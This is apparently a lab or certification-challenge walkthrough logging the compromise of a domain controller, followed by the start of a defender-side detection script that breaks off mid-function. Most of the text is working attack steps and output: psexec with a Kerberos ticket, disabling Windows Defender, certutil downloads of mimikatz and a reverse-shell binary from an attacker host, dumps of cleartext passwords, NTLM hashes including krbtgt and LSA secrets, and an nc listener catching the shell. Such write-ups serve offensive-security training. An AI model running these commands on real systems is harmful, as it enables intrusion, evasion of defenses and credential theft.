172.16.64.168 is the domain controller server.

┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ **export KRB5CCNAME=/home/kali/Documents/osep/Challenge/5/krb5cc_75401103_oJ6stY**

┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ **impacket-psexec -k -no-pass -target-ip 172.16.64.168 -dc-ip 172.16.64.168 dmzdc01.complyedge.com**           
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 172.16.64.168.....
[*] Found writable share ADMIN$
[*] Uploading file YAjgeonw.exe
[*] Opening SVCManager on 172.16.64.168.....
[*] Creating service QeRL on 172.16.64.168.....
[*] Starting service QeRL.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1397]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\\Windows\\system32> **hostname**
dmzdc01

C:\\Windows\\system32> ipconfig
 
Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 172.16.64.168
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.64.254

C:\\Windows\\system32> **type c:\\Users\\Administrator\\Desktop\\proof.txt**
48032d41ce0f31dd5a2b96031dad9936
C:\\Windows\\system32> klist
 
Current LogonId is 0:0x3e7

Cached Tickets: (11)

#0>     Client: dmzdc01$ @ COMPLYEDGE.COM
        Server: krbtgt/COMPLYEDGE.COM @ COMPLYEDGE.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize 
        Start Time: 7/28/2022 21:31:59 (local)
        End Time:   7/29/2022 7:31:59 (local)
        Renew Time: 8/4/2022 21:31:59 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x2 -> DELEGATION 
        Kdc Called: DMZDC01

#1>     Client: dmzdc01$ @ COMPLYEDGE.COM
        Server: krbtgt/COMPLYEDGE.COM @ COMPLYEDGE.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize 
        Start Time: 7/28/2022 21:31:59 (local)
        End Time:   7/29/2022 7:31:59 (local)
        Renew Time: 8/4/2022 21:31:59 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY 
        Kdc Called: DMZDC01

#2>     Client: dmzdc01$ @ COMPLYEDGE.COM
        Server: GC/dmzdc01.complyedge.com/complyedge.com @ COMPLYEDGE.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize 
        Start Time: 7/28/2022 21:44:27 (local)
        End Time:   7/29/2022 7:31:59 (local)
        Renew Time: 8/4/2022 21:31:59 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0 
        Kdc Called: DMZDC01

#3>     Client: dmzdc01$ @ COMPLYEDGE.COM
        Server: cifs/DMZDC01 @ COMPLYEDGE.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize 
        Start Time: 7/28/2022 21:39:15 (local)
        End Time:   7/29/2022 7:31:59 (local)
        Renew Time: 8/4/2022 21:31:59 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0 
        Kdc Called: DMZDC01

#4>     Client: dmzdc01$ @ COMPLYEDGE.COM
        Server: HTTP/dmzdc01.complyedge.com @ COMPLYEDGE.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize 
        Start Time: 7/28/2022 21:38:06 (local)
        End Time:   7/29/2022 7:31:59 (local)
        Renew Time: 8/4/2022 21:31:59 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0 
        Kdc Called: DMZDC01

#5>     Client: dmzdc01$ @ COMPLYEDGE.COM
        Server: LDAP/DMZDC01 @ COMPLYEDGE.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize 
        Start Time: 7/28/2022 21:37:17 (local)
        End Time:   7/29/2022 7:31:59 (local)
        Renew Time: 8/4/2022 21:31:59 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0 
        Kdc Called: DMZDC01

#6>     Client: dmzdc01$ @ COMPLYEDGE.COM
        Server: cifs/dmzdc01.complyedge.com/complyedge.com @ COMPLYEDGE.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize 
        Start Time: 7/28/2022 21:35:21 (local)
        End Time:   7/29/2022 7:31:59 (local)
        Renew Time: 8/4/2022 21:31:59 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0 
        Kdc Called: DMZDC01

#7>     Client: dmzdc01$ @ COMPLYEDGE.COM
        Server: DMZDC01$ @ COMPLYEDGE.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize 
        Start Time: 7/28/2022 21:35:21 (local)
        End Time:   7/29/2022 7:31:59 (local)
        Renew Time: 8/4/2022 21:31:59 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0 
        Kdc Called: DMZDC01

#8>     Client: dmzdc01$ @ COMPLYEDGE.COM
        Server: DNS/dmzdc01.complyedge.com @ COMPLYEDGE.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize 
        Start Time: 7/28/2022 21:32:12 (local)
        End Time:   7/29/2022 7:31:59 (local)
        Renew Time: 8/4/2022 21:31:59 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0 
        Kdc Called: DMZDC01

#9>     Client: dmzdc01$ @ COMPLYEDGE.COM
        Server: ldap/dmzdc01.complyedge.com/complyedge.com @ COMPLYEDGE.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize 
        Start Time: 7/28/2022 21:32:00 (local)
        End Time:   7/29/2022 7:31:59 (local)
        Renew Time: 8/4/2022 21:31:59 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0 
        Kdc Called: DMZDC01

#10>    Client: dmzdc01$ @ COMPLYEDGE.COM
        Server: ldap/dmzdc01.complyedge.com @ COMPLYEDGE.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize 
        Start Time: 7/28/2022 21:31:59 (local)
        End Time:   7/29/2022 7:31:59 (local)
        Renew Time: 8/4/2022 21:31:59 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0 
        Kdc Called: DMZDC01

C:\\Windows\\system32> whoami
nt authority\\system

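**There is no need to drop into an interactive PowerShell session first, since that is extremely laggy; just run the command directly through powershell.**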
C:\\Windows\\system32> **powershell -exec bypass -c "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose"**
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.
c:\\Users\\Administrator\\Desktop> **certutil.exe -urlcache -f <http://192.168.49.64/mimikatz.exe> mimikatz.exe**
****  Online  ****

CertUtil: -URLCache command completed successfully.

c:\\Users\\Administrator\\Desktop> **certutil.exe -urlcache -f <http://192.168.49.64/SharpHound.exe> SharpHound.exe**
****  Online  ****

CertUtil: -URLCache command completed successfully.
c:\\Users\\Administrator\\Desktop> **mimikatz.exe "sekurlsa::logonPasswords" "exit"**
 
  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \\ / ##       > <https://blog.gentilkiwi.com/mimikatz>
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > <https://pingcastle.com> / <https://mysmartlogon.com> ***/

mimikatz(commandline) # sekurlsa::logonPasswords

Authentication Id : 0 ; 727505 (00000000:000b19d1)
Session           : Interactive from 0
User Name         : Administrator
Domain            : COMPLYEDGE
Logon Server      : DMZDC01
Logon Time        : 7/28/2022 9:32:00 PM
SID               : S-1-5-21-1416213050-106196312-571527550-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : COMPLYEDGE
         * NTLM     : 289136c329f3e42331048a0465b2290a
         * SHA1     : 77ff72368ad479907841e1245b6ac2aa70db4543
         * DPAPI    : 209a8357be66700074393c5aa052d25f
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : COMPLYEDGE
         * Password : (null)
        kerberos :
         * Username : **Administrator**
         * Domain   : **complyedge.com**
         * Password : **fgds90345SDfsw32**
        ssp :
        credman :

Authentication Id : 0 ; 630261 (00000000:00099df5)
Session           : Interactive from 0
User Name         : Administrator
Domain            : COMPLYEDGE
Logon Server      : DMZDC01
Logon Time        : 1/13/2022 11:14:48 AM
SID               : S-1-5-21-1416213050-106196312-571527550-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : COMPLYEDGE
         * NTLM     : 289136c329f3e42331048a0465b2290a
         * SHA1     : 77ff72368ad479907841e1245b6ac2aa70db4543
         * DPAPI    : 209a8357be66700074393c5aa052d25f
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : COMPLYEDGE
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : complyedge.com
         * Password : fgds90345SDfsw32
        ssp :
        credman :

Authentication Id : 0 ; 349675 (00000000:000555eb)
Session           : Interactive from 1
User Name         : pete
Domain            : COMPLYEDGE
Logon Server      : DMZDC01
Logon Time        : 1/13/2022 11:13:17 AM
SID               : S-1-5-21-1416213050-106196312-571527550-1103
        msv :
         [00000003] Primary
         * Username : pete
         * Domain   : COMPLYEDGE
         * NTLM     : 61c6e14f88cd70638f901ea51796a194
         * SHA1     : 8fa1fe20da989703f76541cac475418cff83ef89
         * DPAPI    : ebfe2c3d1f5b47286b8e7ccb19c82840
        tspkg :
        wdigest :
         * Username : pete
         * Domain   : COMPLYEDGE
         * Password : (null)
        kerberos :
         * Username : pete
         * Domain   : COMPLYEDGE.COM
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 69780 (00000000:00011094)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/13/2022 11:12:14 AM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : DMZDC01$
         * Domain   : COMPLYEDGE
         * NTLM     : 0d379f537f53c4fd090b27205861f846
         * SHA1     : 98c10dcf3a39b5cac62496dbce3e6847895b45a4
        tspkg :
        wdigest :
         * Username : DMZDC01$
         * Domain   : COMPLYEDGE
         * Password : (null)
        kerberos :
         * Username : DMZDC01$
         * Domain   : complyedge.com

        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : DMZDC01$
Domain            : COMPLYEDGE
Logon Server      : (null)
Logon Time        : 1/13/2022 11:12:13 AM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : DMZDC01$
         * Domain   : COMPLYEDGE
         * NTLM     : 0d379f537f53c4fd090b27205861f846
         * SHA1     : 98c10dcf3a39b5cac62496dbce3e6847895b45a4
        tspkg :
        wdigest :
         * Username : DMZDC01$
         * Domain   : COMPLYEDGE
         * Password : (null)
        kerberos :
         * Username : dmzdc01$
         * Domain   : COMPLYEDGE.COM
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 41705 (00000000:0000a2e9)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 1/13/2022 11:12:13 AM
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : DMZDC01$
         * Domain   : COMPLYEDGE
         * NTLM     : 559a540f2a805cd3704acd64ac814a5e
         * SHA1     : b4cffe1c159558fe596270d8dca3f8fbe3651421
        tspkg :
        wdigest :
         * Username : DMZDC01$
         * Domain   : COMPLYEDGE
         * Password : (null)
        kerberos :
         * Username : DMZDC01$
         * Domain   : complyedge.com

        ssp :
        credman :

Authentication Id : 0 ; 41655 (00000000:0000a2b7)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 1/13/2022 11:12:13 AM
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : DMZDC01$
         * Domain   : COMPLYEDGE
         * NTLM     : 559a540f2a805cd3704acd64ac814a5e
         * SHA1     : b4cffe1c159558fe596270d8dca3f8fbe3651421
        tspkg :
        wdigest :
         * Username : DMZDC01$
         * Domain   : COMPLYEDGE
         * Password : (null)
        kerberos :
         * Username : DMZDC01$
         * Domain   : complyedge.com
        ssp :
        credman :

Authentication Id : 0 ; 41635 (00000000:0000a2a3)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 1/13/2022 11:12:13 AM
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : DMZDC01$
         * Domain   : COMPLYEDGE
         * NTLM     : 0d379f537f53c4fd090b27205861f846
         * SHA1     : 98c10dcf3a39b5cac62496dbce3e6847895b45a4
        tspkg :
        wdigest :
         * Username : DMZDC01$
         * Domain   : COMPLYEDGE
         * Password : (null)
        kerberos :
         * Username : DMZDC01$
         * Domain   : complyedge.com

        ssp :
        credman :

Authentication Id : 0 ; 41513 (00000000:0000a229)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 1/13/2022 11:12:13 AM
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : DMZDC01$
         * Domain   : COMPLYEDGE
         * NTLM     : 0d379f537f53c4fd090b27205861f846
         * SHA1     : 98c10dcf3a39b5cac62496dbce3e6847895b45a4
        tspkg :
        wdigest :
         * Username : DMZDC01$
         * Domain   : COMPLYEDGE
         * Password : (null)
        kerberos :
         * Username : DMZDC01$
         * Domain   : complyedge.com
        ssp :
        credman :

Authentication Id : 0 ; 349630 (00000000:000555be)
Session           : Interactive from 1
User Name         : pete
Domain            : COMPLYEDGE
Logon Server      : DMZDC01
Logon Time        : 1/13/2022 11:13:17 AM
SID               : S-1-5-21-1416213050-106196312-571527550-1103
        msv :
         [00000003] Primary
         * Username : **pete**
         * Domain   : COMPLYEDGE
         * NTLM     : **61c6e14f88cd70638f901ea51796a194**
         * SHA1     : 8fa1fe20da989703f76541cac475418cff83ef89
         * DPAPI    : ebfe2c3d1f5b47286b8e7ccb19c82840
        tspkg :
        wdigest :
         * Username : pete
         * Domain   : COMPLYEDGE
         * Password : (null)
        kerberos :
         * Username : pete
         * Domain   : COMPLYEDGE.COM
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 1/13/2022 11:12:14 AM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 69799 (00000000:000110a7)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/13/2022 11:12:14 AM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : DMZDC01$
         * Domain   : COMPLYEDGE
         * NTLM     : 559a540f2a805cd3704acd64ac814a5e
         * SHA1     : b4cffe1c159558fe596270d8dca3f8fbe3651421
        tspkg :
        wdigest :
         * Username : DMZDC01$
         * Domain   : COMPLYEDGE
         * Password : (null)
        kerberos :
         * Username : DMZDC01$
         * Domain   : complyedge.com
        ssp :
        credman :

Authentication Id : 0 ; 38960 (00000000:00009830)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 1/13/2022 11:12:11 AM
SID               : 
        msv :
         [00000003] Primary
         * Username : DMZDC01$
         * Domain   : COMPLYEDGE
         * NTLM     : 0d379f537f53c4fd090b27205861f846
         * SHA1     : 98c10dcf3a39b5cac62496dbce3e6847895b45a4
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : DMZDC01$
Domain            : COMPLYEDGE
Logon Server      : (null)
Logon Time        : 1/13/2022 11:12:11 AM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : DMZDC01$
         * Domain   : COMPLYEDGE
         * Password : (null)
        kerberos :
         * Username : dmzdc01$
         * Domain   : COMPLYEDGE.COM
        ssp :
        credman :

mimikatz(commandline) # exit
Bye!

mimikatz dump LSA:

c:\\Users\\Administrator\\Desktop>certutil.exe -urlcache -f <http://192.168.49.64/mimikatz.exe> mimikatz.exe
certutil.exe -urlcache -f <http://192.168.49.64/mimikatz.exe> mimikatz.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\\Users\\Administrator\\Desktop>mimikatz.exe
mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \\ / ##       > <https://blog.gentilkiwi.com/mimikatz>
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > <https://pingcastle.com> / <https://mysmartlogon.com> ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\\SYSTEM

512     {0;000003e7} 1 D 34255          NT AUTHORITY\\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;000003e7} 0 D 3785477     NT AUTHORITY\\SYSTEM     S-1-5-18        (04g,28p)       Primary
 * Thread Token  : {0;000003e7} 1 D 3828525     NT AUTHORITY\\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz # lsadump::secrets
Domain : DMZDC01
SysKey : c2da6065f15b53691ad31d2211291f46

Local name : DMZDC01 ( S-1-5-21-2539665111-59215892-2920640915 )
Domain name : COMPLYEDGE ( S-1-5-21-1416213050-106196312-571527550 )
Domain FQDN : complyedge.com

Policy subsystem is : 1.18
LSA Key(s) : 1, default {9b538b73-e7a4-0dda-47aa-da8a1d94503a}
  [00] {9b538b73-e7a4-0dda-47aa-da8a1d94503a} a08f64ce8c4eee5777d9f29870cae25d5507a8a6c693ec5b8bcca88710ccb62c

Secret  : $MACHINE.ACC
cur/hex : c9 9b c6 be 55 79 fe 0f 4f bb 55 ad f6 fd c0 11 e1 65 60 f6 68 23 10 ac c3 fa 91 f4 06 18 86 67 ba 49 3f 96 e0 24 6b 7f 78 e6 14 f1 cf c7 d1 10 92 45 8e bf 1f 82 75 f2 80 e6 95 60 b2 93 4d 8a b2 6a ac e1 f4 5f e8 79 08 92 11 ed cb a3 ef 9a d4 5a d7 7d b3 d1 bb fe 93 c1 69 e2 d4 61 ac 86 a3 5e fe 16 01 99 4c e4 ee bc 60 05 cf ad 1b eb f5 87 01 60 7b 38 0b 7c 2b 67 f4 9d 10 c8 a7 3e 32 b9 fd 7d 9f c0 f5 9a 96 78 69 ab 72 df 65 b7 41 5e 5b 2b db 1b 80 3b 77 96 21 9b e7 3d 67 ab be 2e 4d 44 e9 e2 cf a3 2c d4 5c 39 ff 14 5b b3 0a 36 07 32 c4 47 aa 2e b2 ae 8c 5d 60 de df 0f 58 b9 e7 f0 61 6d 3b d7 d7 3a 55 e5 40 c0 a6 48 48 6f d6 e9 c7 7c 7a fa 5a 5a d0 ca 14 6b 15 6d af 68 9d 3b e8 61 83 6f 23 ee a1 f8 c7 ef 35 d3 
    NTLM:0d5228237a9025ef742c9f786985f852
    SHA1:cc62f05f1948b99b61a895672b65dcedf9039a2d
old/hex : 99 fd 9f f5 8f 1d 4a 82 95 82 79 55 82 1a ca 43 3e 34 72 82 fc 5a 8e 87 b4 1c 07 2f 44 f9 d8 3c 15 fd 9d f1 d5 69 7a 3f a1 4a 76 33 9e df 95 a6 20 ff 4d c6 e3 aa 45 9b 9b fe 08 fb 00 f6 f3 95 93 b5 70 fb 90 53 01 d1 89 7b 93 8c 78 b1 b5 e3 08 5b 47 30 6b 39 05 64 bc 1d 76 d3 6f 70 68 88 0b c9 8f 7e 39 82 fe d4 16 0d 51 6a ca 5c bd 5e 84 d6 03 ec 7d 21 b2 5b ca e3 3f e6 27 9a 82 4f 53 4c f1 16 c8 30 64 fc 05 34 d4 a6 11 02 77 04 a3 2f a4 f3 18 7b 2b f9 b2 68 e6 e7 da 83 9b 1e 8c a6 82 c0 8c ea 9e fc b8 1f 11 a0 00 04 f6 a9 20 28 ba 70 5d 10 d8 d6 d2 e3 ec fd 37 b3 e1 ee e3 54 9f e3 d6 39 0f d8 22 38 8b 75 e1 51 92 e3 b2 51 bc 6d b2 5d 2b 7a b8 a1 bc a8 6d ed da 0a 1e af d8 63 44 ce 80 8b 90 dd 70 1a 7f b2 47 09 
    NTLM:05590886ef4c43e36ada28abb67ab386
    SHA1:a7626fc177960b0692cb95e744455f6493ea1c8c

**Secret  : DefaultPassword
cur/text: sdfsdSE423**

Secret  : DPAPI_SYSTEM
cur/hex : 01 00 00 00 57 26 9d 1a f0 c4 a1 3f ca 9b 9d 43 2b 4a 52 1c fc 89 44 36 c3 31 66 4f 25 f5 ea 7d 28 ba 75 a9 3a 3e 05 83 16 82 ec 9c 
    full: 57269d1af0c4a13fca9b9d432b4a521cfc894436c331664f25f5ea7d28ba75a93a3e05831682ec9c
    m/u : 57269d1af0c4a13fca9b9d432b4a521cfc894436 / c331664f25f5ea7d28ba75a93a3e05831682ec9c
old/hex : 01 00 00 00 84 00 e1 99 16 02 f0 21 70 56 e6 fc 4f d4 7c ba 8c 9f 15 9b a1 69 95 7e 10 59 da 4e fb 06 1c e7 e3 84 8f 60 58 8f 40 dc 
    full: 8400e1991602f0217056e6fc4fd47cba8c9f159ba169957e1059da4efb061ce7e3848f60588f40dc
    m/u : 8400e1991602f0217056e6fc4fd47cba8c9f159b / a169957e1059da4efb061ce7e3848f60588f40dc

Secret  : NL$KM
cur/hex : 97 6c 5b 88 f8 d1 a6 9d 07 4a 21 93 07 70 c2 42 d1 f9 b7 45 98 7d a5 9e e1 38 20 60 86 2c 8a 93 40 17 5f db 48 29 a9 1b 87 28 ac ed de 49 e2 1d 56 29 be c2 f1 18 ef 6a 9f 54 d1 30 4d c2 01 78 
old/hex : 97 6c 5b 88 f8 d1 a6 9d 07 4a 21 93 07 70 c2 42 d1 f9 b7 45 98 7d a5 9e e1 38 20 60 86 2c 8a 93 40 17 5f db 48 29 a9 1b 87 28 ac ed de 49 e2 1d 56 29 be c2 f1 18 ef 6a 9f 54 d1 30 4d c2 01 78
c:\\Users\\Administrator\\Desktop>mimikatz.exe
mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \\ / ##       > <https://blog.gentilkiwi.com/mimikatz>
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > <https://pingcastle.com> / <https://mysmartlogon.com> ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::lsa /patch
Domain : COMPLYEDGE / S-1-5-21-1416213050-106196312-571527550

RID  : 000001f4 (500)
User : Administrator
LM   : 
NTLM : 289136c329f3e42331048a0465b2290a

RID  : 000001f5 (501)
User : Guest
LM   : 
NTLM : 

RID  : 000001f6 (502)
User : krbtgt
LM   : 
NTLM : 1972974715cd3613d4105ad189e54950

RID  : 0000044f (1103)
User : pete
LM   : 
NTLM : 61c6e14f88cd70638f901ea51796a194

RID  : 00000452 (1106)
User : sshd
LM   : 
NTLM : 8fa75d9aa9f3b6a05eb9e24fc1b9cdfe

**RID  : 00000453 (1107)
User : jim
LM   : 
NTLM : e48c13cefd8f9456d79cd49651c134e8**

RID  : 000003e8 (1000)
User : DMZDC01$
LM   : 
NTLM : 0d5228237a9025ef742c9f786985f852

RID  : 00000454 (1108)
User : WEB05$
LM   : 
NTLM : fec48ee9b5fe6556529b0909ab921e7d

RID  : 00000450 (1104)
User : COMPLY$
LM   : 
NTLM : 1dd653b77c4828e8732706cc42da24d0

Switch to an msf reverse shell:

┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ **impacket-psexec -k -no-pass -target-ip 172.16.64.168 -dc-ip 172.16.64.168 dmzdc01.complyedge.com**
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 172.16.64.168.....
[*] Found writable share ADMIN$
[*] Uploading file ctTSLPZD.exe
[*] Opening SVCManager on 172.16.64.168.....
[*] Creating service uyUi on 172.16.64.168.....
[*] Starting service uyUi.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1397]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\\Windows\\system32> powershell -exec bypass -c "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose"
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.

C:\\Windows\\system32> cd c:\\Users\\Administrator\\Desktop
 
c:\\Users\\Administrator\\Desktop> **certutil.exe -urlcache -f <http://192.168.49.64/rev.exe> rev.exe**
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\\Users\\Administrator\\Desktop> rev.exe

The reverse shell connects back:

┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.49.64] from (UNKNOWN) [192.168.64.169] 62158
Microsoft Windows [Version 10.0.17763.1397]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\\Users\\Administrator\\Desktop>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 172.16.64.168
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.64.254

c:\\Users\\Administrator\\Desktop>hostname
hostname
dmzdc01

c:\\Users\\Administrator\\Desktop>whoami
whoami
nt authority\\system

c:\\Users\\Administrator\\Desktop>**certutil.exe -urlcache -f <http://192.168.49.64/Seatbelt_x64.exe> Seatbelt_x64.exe**
certutil.exe -urlcache -f <http://192.168.49.64/Seatbelt_x64.exe> Seatbelt_x64.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.
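
Seen from the defender's side, the session so far leaves three traces on dmzdc01: a service install with a random 4-letter name running a random 8-letter .exe from ADMIN$, a `Set-MpPreference -Disable…` call, and `certutil -urlcache` downloads. The triage script below is an added example, not part of the original notes; the event dict layout, the `%systemroot%\…` image path form and the sample events are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample events modelled on the commands in this walkthrough.
# The dict layout is a simplification assumed for this example: id 7045 stands
# for a service-install record, id 4688 for a process-creation record.
SAMPLE_EVENTS = [
    {"id": 7045, "host": "dmzdc01", "service": "QeRL",
     "image": r"%systemroot%\YAjgeonw.exe"},
    {"id": 4688, "host": "dmzdc01",
     "cmd": 'powershell -exec bypass -c "Set-MpPreference '
            '-DisableIOAVProtection $true -DisableRealtimeMonitoring $true"'},
    {"id": 4688, "host": "dmzdc01",
     "cmd": "certutil.exe -urlcache -f http://192.168.49.64/rev.exe rev.exe"},
    # Benign look-alikes on a made-up host; none of these may fire.
    {"id": 4688, "host": "filesrv01", "cmd": r"certutil.exe -verify C:\certs\ca.cer"},
    {"id": 4688, "host": "filesrv01", "cmd": 'powershell -c "Get-MpPreference"'},
    {"id": 7045, "host": "filesrv01", "service": "WinDefend",
     "image": r"C:\ProgramData\Microsoft\Windows Defender\MsMpEng.exe"},
]

# Heuristic taken from the two runs on this page (QeRL/YAjgeonw.exe and
# uyUi/ctTSLPZD.exe): alphabetic 4-char service, alphabetic 8-char binary
# sitting directly in the Windows directory (where ADMIN$ points).
SVC_IMAGE = re.compile(r"(?:%systemroot%|[a-z]:\\windows)\\[a-z]{8}\.exe", re.I)
SVC_NAME = re.compile(r"[a-z]{4}", re.I)
# Any Defender protection switched off via Set-MpPreference.
DEFENDER_SWITCH = re.compile(r"-(Disable\w+)\s+(?:\$true|1)\b", re.I)
URL = re.compile(r"https?://[^\s\"'<>]+", re.I)


def check_event(ev):
    """Return (rule, detail) for one event, or None when nothing matches."""
    if ev["id"] == 7045:
        image = ev.get("image", "").strip('"')
        if SVC_IMAGE.fullmatch(image) and SVC_NAME.fullmatch(ev.get("service", "")):
            return ("remote-service-exec", f'{ev["service"]} -> {image}')
    elif ev["id"] == 4688:
        cmd = ev.get("cmd", "")
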